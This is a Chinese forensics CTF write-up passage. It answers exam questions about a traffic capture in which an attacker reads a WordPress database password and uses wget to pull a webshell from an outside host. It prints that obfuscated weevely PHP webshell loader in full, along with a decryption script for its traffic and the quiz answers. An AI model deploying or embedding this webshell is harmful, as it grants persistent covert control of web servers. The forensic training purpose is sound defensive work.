wordpress-4.8.zip
zico-history.tar.gz
$
ls -lh
total 9.0M
-rw-rw-r-- 1 zico zico 493K Jun 14 2017 bootstrap.zip
drwxrwxr-x 18 zico zico 4.0K Jun 19 2017 joomla
drwxrwxr-x 6 zico zico 4.0K Aug 19 2016 startbootstrap-business-casual-gh-pages
-rw-rw-r-- 1 zico zico 61 Jun 19 2017 to_do.txt
drwxr-xr-x 5 zico zico 4.0K Jun 19 2017 wordpress
-rw-rw-r-- 1 zico zico 8.5M Jun 19 2017 wordpress-4.8.zip
-rw-rw-r-- 1 zico zico 1.2K Jun 8 2017 zico-history.tar.gz
$
cat to_do.txt
try list:
- joomla
- bootstrap (+phpliteadmin)
- wordpress
$
cat wordpress
cat: wordpress: Is a directory
$
cd wordpress
$
ls
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
$
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'zico');
/** MySQL database username */
define('DB_USER', 'zico');
/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
/** MySQL hostname */
define('DB_HOST', 'zico');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
define('AUTH_SALT', 'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT', 'put your unique phrase here');
define('NONCE_SALT', 'put your unique phrase here');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
$
ls
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
$
cat wp-config.php |grep password
/** MySQL database password */
$
cat wp-config.php |grep -i pass
/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
$
ls /var/www
LICENSE
README.md
css
dbadmin
gulpfile.js
img
index.html
js
less
package.json
tools.html
vendor
view.php
$
cd /var/www
$
ls -lh
total 64K
-rwxrwxrwx 1 root root 1.1K Jun 8 2017 LICENSE
-rwxrwxrwx 1 root root 1.5K Jun 8 2017 README.md
drwxrwxrwx 2 root root 4.0K Jun 8 2017 css
drwxrwxrwx 2 root root 4.0K Jun 8 2017 dbadmin
-rwxrwxrwx 1 root root 3.1K Jun 8 2017 gulpfile.js
drwxrwxrwx 3 root root 4.0K Jun 8 2017 img
-rwxrwxrwx 1 root root 7.8K Jun 8 2017 index.html
drwxrwxrwx 2 root root 4.0K Jun 8 2017 js
drwxrwxrwx 2 root root 4.0K Jun 8 2017 less
-rwxrwxrwx 1 root root 789 Jun 8 2017 package.json
-rwxrwxrwx 1 root root 8.2K Jun 8 2017 tools.html
drwxrwxrwx 7 root root 4.0K Jun 8 2017 vendor
-rwxrwxrwx 1 root root 61 Jun 8 2017 view.php
$
wget 192.168.75.132:2000/help.php
--2024-07-31 15:03:35-- http://192.168.75.132:2000/help.php
Connecting to 192.168.75.132:2000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 771 [application/octet-stream]
help.php: Permission denied
Cannot write to `help.php' (Permission denied).
$
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
ls
LICENSE
README.md
css
dbadmin
gulpfile.js
img
index.html
js
less
package.json
tools.html
vendor
view.php
$
ls -lh
total 64K
-rwxrwxrwx 1 root root 1.1K Jun 8 2017 LICENSE
-rwxrwxrwx 1 root root 1.5K Jun 8 2017 README.md
drwxrwxrwx 2 root root 4.0K Jun 8 2017 css
drwxrwxrwx 2 root root 4.0K Jun 8 2017 dbadmin
-rwxrwxrwx 1 root root 3.1K Jun 8 2017 gulpfile.js
drwxrwxrwx 3 root root 4.0K Jun 8 2017 img
-rwxrwxrwx 1 root root 7.8K Jun 8 2017 index.html
drwxrwxrwx 2 root root 4.0K Jun 8 2017 js
drwxrwxrwx 2 root root 4.0K Jun 8 2017 less
-rwxrwxrwx 1 root root 789 Jun 8 2017 package.json
-rwxrwxrwx 1 root root 8.2K Jun 8 2017 tools.html
drwxrwxrwx 7 root root 4.0K Jun 8 2017 vendor
-rwxrwxrwx 1 root root 61 Jun 8 2017 view.php
$
wordpress
14.分析网络流量包检材,攻击者获取到的数据库密码是?(答案格式:大小写按实际值填写) (4分)
sWfCsfJSPV9H3AmQzw8
15.分析网络流量包检材,攻击上传了一个weevely木马进行权限维持,上传时所使用的端口号为?(答案格式:3306) (2分)
在追踪的TCP流中可知上传的weevely木马是help.php,使用的端口号为2000
2000
16.分析网络流量包检材,攻击者上传了一个weevely木马进行权限维持,该木马第一次执行时获取到的缓冲区内容是?(答案格式:按实际值填写) (4分)
由上题可知攻击者上传的weevely木马文件名称为help.php,Ctrl+F打开搜索按钮,在分组列表中搜索help.php,右键追踪HTTP流,可得到加解密代码

GET /help.php HTTP/1.1
User-Agent: Wget/1.13.4 (linux-gnu)
Accept: */*
Host: 192.168.75.132:2000
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.11.8
Date: Wed, 31 Jul 2024 07:03:35 GMT
Content-type: application/octet-stream
Content-Length: 771
Last-Modified: Wed, 31 Jul 2024 07:00:33 GMT
<?php
$q='uv1o2g6mkn7y";fv1unctiv1ov1n x(v1$t,$k){$c=v1strlen(v1$k)v1;v1$l=strlenv1($t);$o';
$k='tents(v1"php://iv1nput"),$v1mv1)==1) {@ov1b_start();v1@ev1val(@v1gzuncomv1press(@x(@';
$A='$k="c6v1ae1ev170";$khv1="cbbf9v1691e009";v1$v1kv1f="85a8v19e92c410";$p="dv1zINv1Rg';
$o='="v1";forv1($i=0;$v1iv1v1<$l;){fv1v1or($j=0;($j<$c&&$i<$lv1);$j++,$i++)v1{v1$o.=v1$t{$i}^';
$D=str_replace('cM','','cMcreacMte_cMfcMunccMcMtion');
$Q='$k{$j}v1v1;}}return v1$o;v1}if (@pregv1_v1match("/v1$kh(.+)v1v1$kf/",@v1fv1ile_get_cov1n';
$Z='leanv1();$r=@base6v14_ev1ncv1ode(v1@x(@gzcov1mpress($ov1),$v1kv1));printv1("$p$kh$r$kf");}';
$w='v1basev164_decodev1($mv1[v11]),$v1k)));$o=@ov1b_get_contev1nts(v1v1);@ob_env1d_c';
$S=str_replace('v1','',$A.$q.$o.$Q.$k.$w.$Z);
$C=$D('',$S);$C();
?>
查找第一个向help.php发送POST请求的数据包,追踪该数据包

追踪第一个
使用去除混肴后的php脚本解密数据包
<?php
$k = "c6ae1e70";
$kh = "cbbf9691e009";
$kf = "85a89e92c410";
$p = "dzINRguo2g6mkn7y";
// 输入的加密字符串
$encrypted_string = "dzINRguo2g6mkn7ycbbf9691e009G6pSUAZWgTBjNUtkPw==85a89e92c410";
// 提取密文部分
$pattern = "/$kh(.+)$kf/";
preg_match($pattern, $encrypted_string, $matches);
if (isset($matches[1])) {
$encrypted_data = $matches[1];
// Base64 解码
$decoded_data = base64_decode($encrypted_data);
// 解密
function x($t, $k) {
$c = strlen($k);
$l = strlen($t);
$o = "";
for ($i = 0; $i < $l;) {
for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
$o .= $t[$i] ^ $k[$j];
}
}
return $o;
}
$decrypted_data = x($decoded_data, $k);
// Gzip 解压
$uncompressed_data = gzuncompress($decrypted_data);
// 输出解密后的结果
echo $uncompressed_data;
} else {
echo "No match found.";
}
?>

浙公网安备 33010602011771号